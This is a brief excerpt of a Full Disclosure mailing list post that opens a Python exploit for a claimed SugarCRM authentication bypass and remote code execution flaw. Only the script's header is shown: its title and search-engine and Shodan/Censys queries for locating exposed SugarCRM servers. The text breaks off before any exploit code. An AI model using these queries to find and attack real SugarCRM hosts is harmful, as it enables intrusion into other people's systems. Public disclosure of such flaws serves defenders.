Read Time:22 Second
Posted by sw33t.0day via Fulldisclosure on Dec 30
#!/usr/bin/env python
#
# SugarCRM 0-day Auth Bypass + RCE Exploit
#
# Dorks:
# https://www.google.com/search?q=site:sugarondemand.com&filter=0
# https://www.google.com/search?q=intitle:”SugarCRM”+inurl:index.php
# https://www.shodan.io/search?query=http.title:”SugarCRM"
# https://search.censys.io/search?resource=hosts&q=services.http.response.html_title:”SugarCRM"
#…